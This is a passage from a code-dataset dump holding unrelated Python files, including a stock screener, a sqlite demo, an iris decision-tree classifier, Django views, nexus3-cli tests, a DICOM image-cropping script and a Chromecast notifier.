file:\n            pickle.dump(data, file)\n        start = end\n        end += 500\n        time.sleep(1)\n\n\ndef readStockDataFromFile():\n    data = []\n\n    for file in files_data:\n        with open(file, 'rb') as f:\n            info = pickle.load(f)\n        stocks_keys = list(info)\n\n        # Points of interest for stocks\n        points = ['symbol', 'netProfitMarginMRQ', 'peRatio', 'pegRatio', 'high52', 'dividendAmount']\n        for stock in stocks_keys:\n            stock_data = []\n            for point in points:\n                stock_data.append(info[stock]['fundamental'][point])\n            data.append(stock_data)\n        os.remove(file)\n    return data\n\n\ndef createScreenerTable():\n    data = readStockDataFromFile()\n\n    # New columns for data to be displayed\n    columns = ['Symbol', 'Margin', 'PE', 'PEG', 'high52', 'Dividend']\n    file_results = pandas.DataFrame(data, columns=columns)\n    \n    fig = go.Figure(data=[go.Table(\n        header=dict(\n            values=columns,\n            line_color='paleturquoise',\n            align='center'\n        ),\n        cells=dict(\n            values=[\n                file_results.Symbol,\n                file_results.Margin,\n                file_results.PE,\n                file_results.PEG,\n                file_results.high52,\n                file_results.Dividend]\n        ))\n    ])\n\n    fig.show()\n\nif __name__ == '__main__':\n    writeStockData()\n    createScreenerTable()","sub_path":"stock-screener.py","file_name":"stock-screener.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"469875179","text":"#!/usr/bin/env python\n\ndef parse_sh_ip_int_br():\n    import re\n    with open('sh_ip_int_br.txt') as cfg:\n        file = cfg.readlines()\n    rslt = []\n    for l in file:\n        r = re.search(r'(\\S+) +(\\S+) .*(u\\S+|d\\S+) .*(u\\S+|d\\S+)', l)\n        if r:\n            rslt.append(r.groups())\n    return rslt\n\n\nif __name__ == '__main__':\n    print(parse_sh_ip_int_br())\n","sub_path":"15_module_re/answ_15_2_parse_sh_ip_int_br.py","file_name":"answ_15_2_parse_sh_ip_int_br.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187801614","text":"'''\r\ndatabase with sqlite 3\r\n-------------------------\r\n\r\n'''\r\n\r\nimport sqlite3 \r\nfrom datetime import datetime\r\n\r\n\r\nclass Database:\r\n    def __init__(self) -> None:\r\n        self.conn=sqlite3.connect('Library.sqlite3')\r\n        self.cur=self.conn.cursor()\r\n        self.cur.execute(\"CREATE TABLE IF NOT 
EXISTS tblbook(id INTEGER PRIMARY KEY, title VARCHAR(50),author VARCHAR(50), year INTEGER,pdate DATE )\")\r\n self.conn.commit()\r\n\r\n def adddata (self):\r\n print('Add your record: ')\r\n print('='*40)\r\n t1=input('Title: ')\r\n a1=input('Author: ')\r\n y1=input('Year : ')\r\n\r\n self.cur.execute(\"INSERT INTO tblbook(title,author,year,pdate) VALUES(?,?,?,?)\",(t1,a1,y1,datetime.today()))\r\n self.conn.commit()\r\n\r\n\r\n def showdata(self):\r\n self.cur.execute('SELECT * FROM tblbook')\r\n print(\"\\n\\n%-5s %-20s %-15s %-10s %-10s \"%('ID','TITLE','AUTHOR','YEAR','PDATE'))\r\n print('='*80)\r\n for data in self.cur.fetchall() :\r\n print(\"%-5s %-20s %-15s %-10s %-10s \"%(data[0],data[1],data[2],data[3],data[4]))\r\n\r\n \r\ndb= Database()\r\ndb.adddata() \r\ndb.showdata()","sub_path":"day16/lesson16_database.py","file_name":"lesson16_database.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"612320456","text":"import pandas as pd\r\nimport os\r\n\r\ncwd = os.getcwd()\r\nprint('Current working directory: '+cwd)\r\n\r\n#---walking thru the current working directory---#\r\n\r\n#---root = cwd, dir = sub dirs in cwd, files = files in cwd---#\r\nfor root,dirs,files in os.walk(cwd):\r\n for file in files:\r\n if file.endswith('.csv'):\r\n #---extract data\r\n filenames_df = pd.read_csv(file, header = None)\r\n \r\n#print (filenames_df)\r\nFileNames = filenames_df[0] \r\n \r\n#---get the name of the files after sorting by the date modified---#\r\nFiles = os.listdir(cwd)\r\nfull_list = [os.path.join(cwd,i) for i in Files] #this method is called List comprehension\r\ntime_sorted_list = sorted(full_list, key=os.path.getmtime)\r\n\r\n#---remove the path from elements and extract only name of the files in the cwd---\r\nsorted_filename_list = [ os.path.basename(i) for i in time_sorted_list]\r\n\r\ni = 0 #list index\r\ntopicNo = 1 #topicNos\r\nFileNo = 0 #renaming index\r\n\r\nfor file in sorted_filename_list:\r\n\r\n #---check for filenames with no extension---#\r\n SplitExt = os.path.splitext(file)\r\n if SplitExt[1] == '':\r\n \r\n source = cwd + '\\\\' + file\r\n\r\n #---check for the topic files and create txt files---#\r\n TopicCheck = str(topicNo) + '. '\r\n if FileNames[i].find(TopicCheck) != -1:\r\n #print (FileNames[i])\r\n FileNames[i].replace(TopicCheck,'')\r\n \r\n #---create the txt file---#\r\n f = open('0' + str(FileNo) +'. ' + FileNames[i]+'.txt','w')\r\n f.close\r\n \r\n topicNo = topicNo + 1\r\n i=i+1\r\n \r\n destination = cwd + '\\\\' + str(FileNo) + '.' + FileNames[i] + '.mp4'\r\n os.rename(source,destination) #rename it finally!\r\n \r\n FileNo = FileNo+1\r\n i=i+1\r\n\r\n","sub_path":"Rename course files/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"83194065","text":"# -- encoding:utf-8 --\n\"\"\"\n@File : 02_案例代码:基于决策树算法的鸢尾花分类\n@Author: Octal_H\n@Date : 2019/10/13\n@Desc : \n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\n\nmpl.rcParams['font.sans-serif'] = [u'simHei']\n\nnp.random.seed(0)\n\n# 1. 
Load the data (data usually lives on disk or in a database)\npath = '../datas/iris.data'\nnames = ['A', 'B', 'C', 'D', 'cla']\ndf = pd.read_csv(path, header=None, names=names)\n\n\n# 2. Clean the data\n\n\n# # 3. Extract the raw feature matrix X and the target attribute Y as required\nX = df[names[0:-1]]\nY = df[names[-1]]\nprint(Y)\nlabel_encoder = LabelEncoder()\nlabel_encoder.fit(Y)\nY = label_encoder.transform(Y)\n# The encoded values are simply the indices of the corresponding labels in the classes_ collection\n# print(label_encoder.classes_)\n# true_label = label_encoder.inverse_transform([0, 1, 2, 0])\n# print(true_label)\n# print(Y)\n\n\n# 4. Split the data\n# train_size: fraction of the data kept for training after the split, default 0.75\n# random_state: random seed used for the split; the default None uses the current timestamp, while any fixed value makes repeated runs reproducible.\nx_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=0.8, random_state=28)\nprint(\"Shape of training data X: {}, and type: {}\".format(x_train.shape, type(x_train)))\nprint(\"Shape of test data X: {}\".format(x_test.shape))\nprint(\"Type of training data Y: {}\".format(type(y_train)))\n\n\n# 5. Feature engineering\n# NOTE: no feature engineering is done here\n\n\n# 6. Build the model object\n\"\"\"\ncriterion=\"gini\", -> impurity measure used when scoring candidate split features; options: gini and entropy\nsplitter=\"best\", -> strategy for choosing the split on the selected feature; options: best and random\nmax_depth=None, -> pruning parameter: maximum depth the finished tree may reach; None means unlimited\nmin_samples_split=2, -> pruning parameter: a node holding fewer samples than this value is not split further.\nmin_samples_leaf=1, -> pruning parameter: minimum number of samples required in a leaf; int gives a count, float a fraction\nmax_features=None, -> how many features to consider when searching for the best split; the default None searches all features\nrandom_state=None, -> random seed\nmax_leaf_nodes=None, -> pruning parameter: maximum number of leaf nodes allowed; None means unlimited\n\"\"\"\nalgo = DecisionTreeClassifier(criterion='gini')\n\n\n# 7. Train the model\nalgo.fit(x_train, y_train)\n\n\n# 8. Evaluate the model\ntrain_predict = algo.predict(x_train)\ntest_predict = algo.predict(x_test)\nprint(\"Accuracy on the test set: {}\".format(algo.score(x_test, y_test)))\nprint(\"Accuracy on the training set: {}\".format(algo.score(x_train, y_train)))\nprint(\"Classification report on the test set:\\n{}\".format(classification_report(y_test, test_predict)))\nprint(\"Classification report on the training set:\\n{}\".format(classification_report(y_train, train_predict)))\nprint(\"Feature importance weights (larger values mean more important features): {}\".format(algo.feature_importances_))\n
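\n# Optionally, the LabelEncoder fitted above can map the predicted class\n# indices back to the original label strings, e.g.:\n# pred_labels = label_encoder.inverse_transform(test_predict)\n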
\n\n# 9. Other: inspect the raw predicted probabilities\nprint(\"Predicted probability values:\\n{}\".format(algo.predict_proba(x_test)))\n\n","sub_path":"sklearn11/1117/02_案例代码:基于决策树算法的鸢尾花分类.py","file_name":"02_案例代码:基于决策树算法的鸢尾花分类.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"504413128","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import cache_page\n\nfrom django.contrib.auth.models import User\nfrom mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification\n\nfrom mapApp.models import Incident, Hazard, Theft, AlertArea, Point\n\n@login_required\ndef stats(request):\n\tuser = request.user\n\n\t# Get the user's alertable points in the last month\n\tcollisions = Incident.objects.filter(p_type__exact=\"collision\") | Incident.objects.filter(p_type__exact=\"fall\")\n\tnearmisses = Incident.objects.filter(p_type__exact=\"nearmiss\")\n\thazards = Hazard.objects.all()\n\tthefts = Theft.objects.all()\n\n\trois = AlertArea.objects.filter(user=user.id)\n\n\t# recent sets = points that intersect any ROI defined by the user and were reported in the last month\n\tcollisionsInPoly = Incident.objects.none()\n\tnearmissesInPoly = Incident.objects.none()\n\thazardsInPoly = Hazard.objects.none()\n\ttheftsInPoly = Theft.objects.none()\n\t# Find intersecting points\n\tfor g in rois:\n\t\tcollisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)\n\t\tnearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)\n\t\thazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)\n\t\ttheftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)\n\n\tcontext = {\n\t\t'user': user,\n\n\t\t'geofences': rois,\n\n\t\t'collisions': collisions,\n\t\t'nearmisses': nearmisses,\n\t\t'hazards': hazards,\n\t\t'thefts': thefts,\n\n\t\t'collisionsInPoly': collisionsInPoly,\n\t\t'nearmissesInPoly': nearmissesInPoly,\n\t\t'hazardsInPoly': hazardsInPoly,\n\t\t'theftsInPoly': theftsInPoly,\n\t}\n\n\treturn render(request, 'mapApp/stats.html', context)\n\n# @cache_page(60 * 15)\ndef vis(request):\n\tincidents = Incident.objects.only('p_type').all()\n\n\tcontext = {\n\t\t'collisions': incidents.filter(p_type__exact=\"collision\"),\n\t\t'nearmisses': incidents.filter(p_type__exact=\"nearmiss\"),\n\t\t'hazards': Hazard.objects.all(),\n\t\t'thefts': Theft.objects.all(),\n\t\t'points': Point.objects.all(),\n\t\t'alertAreas': AlertArea.objects.filter(user=request.user.id)\n\t}\n\treturn render(request, 'mapApp/vis.html', context)\n","sub_path":"mapApp/views/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446965823","text":"\nimport random \n\nclass Player:\n\n    def __init__(self):\n        self.present_card = 0\n        self.future_card = 0\n        # per-instance score list (was a shared, mutable class attribute)\n        self.total_points = [300]\n\n    def draw(self):\n        self.present_card = random.randint(1, 13)\n        self.future_card = random.randint(1, 13)\n\n    def guess(self):\n        print(f\"The card is {self.present_card}\")\n\n        
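# Ask the player to call the next card before it is revealed.\n        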
ans = input(\"The next card will be higher or lower? l/h: \").lower()\n\n        print(f\"Next card was {self.future_card}\")\n\n        if self.present_card < self.future_card:\n            next_card = \"h\"\n        elif self.present_card > self.future_card:\n            next_card = \"l\"\n        else:\n            next_card = \"equal\"\n        # the guess is right only if it matches the actual direction;\n        # a tie counts as neither right nor wrong (the result previously depended on ans alone)\n        if next_card == \"equal\":\n            result = None\n        else:\n            result = (ans == next_card)\n        return result\n\n\n    def count_points(self): \n        guess = self.guess() \n        if guess == True:\n            self.total_points.append(100)\n        elif guess == False:\n            self.total_points.append(-75)\n        elif guess == None:\n            self.total_points.append(0)\n        return sum(self.total_points)\n\n","sub_path":"hilo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575775521","text":"import requests\nimport smtplib\nimport shutil\nimport config\n\nfrom bs4 import BeautifulSoup\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\n\n# Daily xkcd dose - Pulls a random xkcd comic and sends it to you by mail.\n\n\ndef get_image():\n    # Finds and loads the image\n    header = \"xkcd\"\n    r = requests.get(\"https://c.xkcd.com/random/comic/\", header)\n    soup = BeautifulSoup(r.text, features=\"html.parser\")\n    comic_div = soup.find(id=\"comic\")\n    img = comic_div.find(\"img\")\n    img_url = img.get(\"src\")\n    fixed_img_url = \"https:\" + img_url\n    get_image.filename = img.get(\"alt\") + \".png\"\n    with requests.get(fixed_img_url, header, stream=\"True\") as r, open(get_image.filename, \"wb\") as fp:\n        r.raw.decode_content = True\n        shutil.copyfileobj(r.raw, fp)\n\n\ndef send_mail():\n\n    # Message config\n    msgRoot = MIMEMultipart(\"related\")\n    msgRoot[\"Subject\"] = \"Your daily xkcd dose - \" + get_image.filename\n    msgRoot[\"From\"] = config.send_from\n    msgRoot[\"To\"] = config.send_to\n\n    # Loads image to mail\n    fp = open(get_image.filename, \"rb\")\n    msgImage = MIMEImage(fp.read())\n    fp.close()\n    msgImage.add_header(\"Content-ID\", \"\")\n    msgRoot.attach(msgImage)\n\n    # Starts SMTP connection and sends the mail\n    server = smtplib.SMTP_SSL(config.host)\n    server.connect(config.host, config.port)\n    server.login(config.send_from, config.password)\n    server.sendmail(config.send_from, config.send_to, msgRoot.as_string())\n\n\nget_image()\nsend_mail()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383635077","text":"import itertools\nimport pytest\nfrom semver import VersionInfo\n\nfrom nexuscli.api.repository import model\n\n\n@pytest.mark.parametrize(\n    'repo_class',\n    pytest.helpers.repositories_by_type(['hosted', 'proxy', 'group']))\ndef test_repository_recipe(repo_class, faker):\n    \"\"\"\n    For repository classes that accept multiple recipes, ensure the recipe\n    given is supported. 
For other repositories, ensure the recipe given is\n ignored.\n \"\"\"\n accepts_multiple = bool((len(repo_class.RECIPES)-1))\n missing_recipe = faker.pystr()\n\n # TODO: DRY-UP this pattern\n kwargs = {'recipe': missing_recipe}\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n if accepts_multiple:\n with pytest.raises(ValueError):\n repo_class(faker.word(), **kwargs)\n else:\n repo = repo_class(faker.word(), **kwargs)\n assert repo.recipe_name != missing_recipe\n\n\n@pytest.mark.parametrize(\n 'repo_class', pytest.helpers.repositories_by_type('hosted'))\ndef test_upload_file(repo_class, mocker, file_upload_args, faker):\n \"\"\"\n Ensure all hosted repositories have an upload_file method that calls the\n right helper from the upload module.\n \"\"\"\n src_file, _, dst_dir, dst_file = file_upload_args\n\n repo = repo_class(faker.word())\n\n x_upload_method_name = f'upload_file_{repo.recipe_name}'\n upload_method = mocker.Mock()\n # inject mock upload method into upload module\n mock_upload = mocker.patch('nexuscli.api.repository.model.upload')\n mocker.patch.object(mock_upload, x_upload_method_name, upload_method)\n\n repo.upload_file(src_file, dst_dir, dst_file)\n\n upload_method.assert_called_with(repo, src_file, dst_dir, dst_file)\n\n\n@pytest.mark.parametrize(\n 'repo_class', pytest.helpers.repositories_by_type(['proxy', 'group']))\ndef test_upload_missing(repo_class, faker):\n \"\"\"\n Ensure that no proxy, group repositories have upload_* methods\n \"\"\"\n kwargs = {}\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n repo = repo_class(faker.word(), **kwargs)\n\n with pytest.raises(AttributeError):\n repo.upload_file()\n\n with pytest.raises(AttributeError):\n repo.upload_directory()\n\n\n@pytest.mark.parametrize(\n 'repo_class, recurse, flatten', itertools.product(\n pytest.helpers.repositories_by_type('hosted'), # repo_class\n [True, False], # recurse\n [True, False])) # flatten\ndef test_upload_directory(repo_class, recurse, flatten, mocker, faker):\n \"\"\"\n Ensure the method calls upload_file with parameters based on the quantity\n of files in a given directory.\n \"\"\"\n src_dir = model.upload.REMOTE_PATH_SEPARATOR.join(faker.words())\n dst_dir = model.upload.REMOTE_PATH_SEPARATOR.join(faker.words())\n x_subdirectory = faker.pystr()\n x_file_path = faker.pystr()\n\n util = mocker.patch('nexuscli.api.repository.model.util')\n util.get_files.return_value = faker.pylist(10, True, str)\n util.get_upload_subdirectory.return_value = x_subdirectory\n mocker.patch('os.path.join', return_value=x_file_path)\n\n x_get_upload_subdirectory_calls = [\n mocker.call(dst_dir, x_file_path, flatten)\n for _ in util.get_files.return_value # just need the count of calls\n ]\n\n repo = repo_class(faker.word())\n repo.upload_file = mocker.Mock()\n\n repo.upload_directory(src_dir, dst_dir, recurse=recurse, flatten=flatten)\n\n util.get_files.assert_called_with(src_dir, recurse)\n util.get_upload_subdirectory.assert_has_calls(\n x_get_upload_subdirectory_calls)\n repo.upload_file.assert_called_with(x_file_path, x_subdirectory)\n\n\n@pytest.mark.parametrize(\n 'repo_class',\n pytest.helpers.repositories_by_type(['hosted', 'proxy', 'group']))\ndef test_repository_configuration(\n repo_class, mock_nexus_client, faker, gpg_key_as_cwd):\n x_name = faker.word()\n x_cleanup_policy = faker.word()\n x_blob_store_name = faker.word()\n x_remote_url = faker.url()\n x_strict = faker.pybool()\n\n kwargs = {\n 'nexus_client': mock_nexus_client,\n 'cleanup_policy': 
x_cleanup_policy,\n 'blob_store_name': x_blob_store_name,\n 'strict_content_type_validation': x_strict,\n }\n\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = x_remote_url\n\n repo = repo_class(x_name, **kwargs)\n configuration = repo.configuration\n attributes = configuration['attributes']\n\n assert configuration['name'] == x_name\n assert attributes['cleanup']['policyName'] == [x_cleanup_policy]\n assert attributes['storage']['blobStoreName'] == x_blob_store_name\n assert attributes['storage']['strictContentTypeValidation'] == x_strict\n\n if repo.TYPE and repo.TYPE == 'proxy':\n assert attributes['proxy']['remoteUrl'] == x_remote_url\n\n\n@pytest.mark.parametrize(\n 'yum_repo',\n pytest.helpers.yum_repos()\n)\ndef test_yum_repository_configuration(yum_repo, mock_nexus_client, faker):\n x_name = faker.word()\n x_depth = faker.pyint()\n\n kwargs = {\n 'nexus_client': mock_nexus_client,\n 'depth': x_depth\n }\n\n if yum_repo.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n repo = yum_repo(x_name, **kwargs)\n\n assert repo.configuration['attributes']['yum']['repodataDepth'] == x_depth\n\n\n@pytest.mark.parametrize('version,xpolicy', [\n (None, lambda x: [x]),\n (model.CLEANUP_SET_MIN_VERSION, lambda x: [x]),\n (VersionInfo(0, 0, 0), lambda x: x)\n])\ndef test_cleanup_policy(version, xpolicy, mocker, mock_nexus_client, faker):\n \"\"\"\n From CLEANUP_SET_MIN_VERSION, Nexus takes a set of policy names instead\n of a single policy. Ensure the method returns the right type according to\n the version.\n https://github.com/thiagofigueiro/nexus3-cli/issues/77\n \"\"\"\n policy = faker.word()\n\n mock_nexus_client.server_version = version\n repository = model.Repository(\n 'myrepo', nexus_client=mock_nexus_client, cleanup_policy=policy)\n\n assert repository.cleanup_policy == xpolicy(policy)\n","sub_path":"tests/api/repository/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"654122799","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport cv2, os\nimport xlrd\nimport matplotlib.pyplot as plt\nimport readdicom\nimport dataread\n\n\n# 读取dicom图像\ndef read_dicom(path):\n im = readdicom.getImage(path)\n return im\n\n\n# 读取jpg图像\ndef read_jpg(path):\n im = cv2.imread(path)\n return im\n\n\n# 起始点\ny_start = 100\nx_start = 100\ndef cut_center(im):\n ''' 截图图片的中心范围,去掉图片边缘的文字信息\n\n :param im: 要处理的图片\n :return: 处理后的图片\n '''\n return im[y_start: -100, x_start: -100]\n\n# 小图截256 * 256,大图按原始比例截图\n# min_size = 256\n# max_size = 500\n# def get_tophi_loc(list):\n# '''返回对图像进行切割的范围\n#\n# :param list: 四个标记点的坐标信息\n# :param ratio: width/hight的比例\n# :return: 切割范围\n# '''\n# loc = np.array(list)\n# # 获取左上,右下两个点\n# x_min, y_min = np.min(loc, 0)\n# x_max, y_max = np.max(loc, 0)\n# # 获取最小范围宽度和高度\n# width = x_max - x_min\n# hight = y_max - y_min\n#\n# # 默认扩大20个像素点的截取范围(上下左右各20)\n# change_width = 20\n# change_hight = 20\n# # 根据ratio对width或hight进行更正\n# if hight > max_size or width > max_size:\n# # 如果超过了最大范围,则直接按实际比例截图\n# pass\n# elif hight > width:\n# if hight > min_size:\n# new_width = hight\n# change_width = (new_width - width) / 2 + 20\n# else:\n# new_width = min_size\n# new_hight = min_size\n# change_width = (new_width - width) / 2 + 20\n# change_hight = (new_hight - hight) / 2 + 20\n# else:\n# if width > min_size:\n# new_hight = width\n# change_hight = (new_hight - hight) / 2 + 20\n# else:\n# new_width = min_size\n# 
new_hight = min_size\n# change_width = (new_width - width) / 2 + 20\n# change_hight = (new_hight - hight) / 2 + 20\n#\n# # 对截取范围修正\n# x_min -= change_width\n# x_max += change_width\n# y_min -= change_hight\n# y_max += change_hight\n#\n# return (int(x_min), int(x_max), int(y_min), int(y_max))\ndef get_tophi_loc(list):\n '''返回对图像进行切割的范围\n\n :param list: 四个标记点的坐标信息\n :param ratio: width/hight的比例\n :return: 切割范围\n '''\n loc = np.array(list)\n # 获取左上,右下两个点\n x_min, y_min = np.min(loc, 0)\n x_max, y_max = np.max(loc, 0)\n # 获取最小范围宽度和高度\n width = x_max - x_min\n hight = y_max - y_min\n\n # 默认扩大20个像素点的截取范围(上下左右各20)\n change_width = 20\n change_hight = 20\n if hight > width:\n change_width = (hight - width) / 2 + 20\n else:\n change_hight = (width - hight) / 2 + 20\n\n # 对截取范围修正\n x_min -= change_width\n x_max += change_width\n y_min -= change_hight\n y_max += change_hight\n\n return (int(x_min), int(x_max), int(y_min), int(y_max))\n\n# 随机平移\ndef translation(x_min, x_max, y_min, y_max):\n x = -np.random.randint(30, 60)\n # y = np.random.randint(30, 60)\n x_min += x\n x_max += x\n # y_min += y\n # y_max += y\n\n return (x_min, x_max, y_min, y_max)\n\n\n# 固定标记的坐标信息\nsign_loc = [(1016, 457), (1017, 430), (1006, 457), (1007, 428), (1110, 455), (1111, 428)]\ndef is_sign(pt):\n '''判断坐标pt是否为固定标记\n :param pt: 点的坐标\n :return: True:是固定标记,False:不是\n '''\n for s_loc in sign_loc:\n if np.abs(s_loc[0] - x_start - pt[0]) <= 3 and np.abs(s_loc[1] - y_start - pt[1]) <= 3:\n return True\n return False\n\n\n# 要处理的图像文件夹\nroot_dir = 'all_data'\n\nresult_dir = 'all_result/result/'\nfailed_dir = 'all_result/failed/'\nwrong_dir = 'all_result/wrong/'\n\nresult_num = 1\ndef generate_cut_img(patient_no, label, path, filename):\n \"\"\"对path对应的文件进行切割,同时保存处理失败的文件\n :param pt:\n filename :文件名\n patient_no :病例号\n path :要处理的文件路径\n label :良恶性标签 1 or 2\n :return:\n An `arg_scope` to use for the resnet models.\n \"\"\"\n\n # 生成result的数量\n global result_num\n # 读取后裁剪出中心信息\n im = read_dicom(path)\n im = cut_center(im)\n # plt.imshow(im)\n # plt.show()\n # 保存原图信息,用于后面截取图片\n img_orig = np.copy(im)\n\n # 将图片二值化\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n _, im = cv2.threshold(im, 180, 255, type=cv2.THRESH_BINARY)\n\n # 读取标记模版\n template1 = cv2.imread('model_img/model1.jpg', 0)\n template2 = cv2.imread('model_img/model2.jpg', 0)\n templates = [template1, template2]\n\n # 保存四个坐标的信息\n list = []\n # 发现固定标记的个数\n picture_sign_num = 0\n for template in templates:\n w, h = template.shape[::-1]\n # 使用matchTemplate对原始灰度图像和图像模板进行匹配\n res = cv2.matchTemplate(im, template, cv2.TM_CCOEFF_NORMED)\n # 设定阈值\n threshold = 0.85\n # res大于85%\n loc = np.where(res >= threshold)\n\n # 使用灰度图像中的坐标对图像进行标记(画方框)\n for pt in zip(*loc[::-1]):\n # 过滤掉固定标记\n if is_sign(pt):\n picture_sign_num += 1\n continue\n cv2.rectangle(im, pt, (pt[0] + w, pt[1] + h), (255, 255, 255), 2)\n list.append(pt)\n # 显示图像\n\n if len(list) != 4:\n if picture_sign_num > 1:\n # plt.imshow(im)\n # plt.show()\n print(filename, ' process failed')\n if not os.path.exists(failed_dir):\n os.mkdir(failed_dir)\n cv2.imwrite(failed_dir + patient_no + '-' + os.path.splitext(filename)[0] + '.jpg', im)\n else:\n # plt.imshow(im)\n # plt.show()\n print(filename, ' data is wrong')\n if not os.path.exists(wrong_dir):\n os.mkdir(wrong_dir)\n cv2.imwrite(wrong_dir + patient_no + '-' + os.path.splitext(filename)[0] + '.jpg', img_orig)\n else:\n x_min, x_max, y_min, y_max = get_tophi_loc(list)\n # plt.imshow(img_orig[y_min:y_max, x_min:x_max])\n # plt.show()\n\n try:\n # 随机平移\n # x_min, x_max, y_min, y_max = 
translation(x_min, x_max, y_min, y_max)\n # 保存截取的结果\n if not os.path.exists(result_dir):\n os.mkdir(result_dir)\n result_img = img_orig[y_min:y_max, x_min:x_max]\n result_img = cv2.resize(result_img, (dataread.ROWS, dataread.COLS), interpolation=cv2.INTER_CUBIC)\n result_img = cv2.cvtColor(result_img, cv2.COLOR_BGR2RGB)\n cv2.imwrite(result_dir + str(label) + patient_no + '_' + str(result_num) + '.jpg',\n result_img)\n result_num += 1\n except:\n print(patient_no)\n\n\nif __name__ == '__main__':\n data = pd.read_excel('2.xls', encoding='utf8')\n data = data.loc[:, ['num', 'label', 'dir', 'filename']]\n\n data = data.dropna(axis=0)\n\n for num, label, dir, filename in data.values:\n if os.path.exists(os.path.join(root_dir, dir)):\n for filename in os.listdir(os.path.join(root_dir, dir)):\n path = os.path.join(root_dir, dir, filename)\n generate_cut_img(num, label, path, filename)\n","sub_path":"genetareimage.py","file_name":"genetareimage.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"109880366","text":"from HiggsAnalysis.HeavyChHiggsToTauNu.OptimisationScheme import HPlusOptimisationScheme, Scenario\n\n# There must be 'optimisation' object\noptimisation = HPlusOptimisationScheme()\n\n_N = [1, 2]\n_leadingDiscr = [(\"T\", 0.898), (\"M\", 0.679), (\"L\", 0.244)]\n_subLeadingDiscr = _leadingDiscr[1:]\n\nscenarios = []\n_subScen = []\n\n# Symmetric cuts for at least 1 b jet\nfor leadName,leadCut in _leadingDiscr:\n scenarios.append(Scenario(\"N1discr\"+leadName,\n jetNumber = 1,\n jetNumberCutDirection = \"GEQ\",\n leadingDiscriminatorCut = leadCut))\n\n\n# Symmetric cuts for at least 1 b jet\nfor leadName,leadCut in _leadingDiscr:\n if leadName in [\"L\",\"M\"]:\n scenarios.append(Scenario(\"N2discr\"+leadName,\n jetNumber = 2,\n jetNumberCutDirection = \"GEQ\",\n leadingDiscriminatorCut = leadCut))\n\nscenarios.extend(_subScen)\n\noptimisation.addBTagVariations(scenarios)\n","sub_path":"HeavyChHiggsToTauNu_REMOVEME/python/optimisation/btagSymmetricScenarios.py","file_name":"btagSymmetricScenarios.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"94263651","text":"#!/usr/bin/python3\nfrom __future__ import print_function\nimport sys; sys.path.insert(0,'/usr/local/lib/python3.4/dist-packages/')\nimport time\nimport pychromecast #https://github.com/balloob/pychromecast/tree/master/pychromecast\nfrom gtts import gTTS #https://github.com/pndurette/gTTS\n#import sys\nURL_DOMOTICZ = 'http://127.0.0.1:8080/' # renseigner l'adresse et le port de votre domoticz\nfor arg in sys.argv:\n\tprint(arg)\ntts = gTTS(text=arg, lang='fr', slow=False)\ntts.save(\"/home/pi/domoticz/www/notification.mp3\")\n\nchromecasts = pychromecast.get_chromecasts()\n\n[cc.device.friendly_name for cc in chromecasts]\n['Yamaha'] # mettre le nom de votre chromecast separe par unevirgule ex: ['douche', 'salon', 'cuisine', 'chambre']\n\t\ncast = next(cc for cc in chromecasts )\n\ncast.wait()\n\nmc = cast.media_controller\n\nmc.play_media(URL_DOMOTICZ+'notification.mp3', 'audio/mp3')\n\nmc.block_until_active()\n\nmc.pause()\n#time.sleep(1)\nmc.play()\n","sub_path":"Python/chromecast.py","file_name":"chromecast.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"32868822","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import 
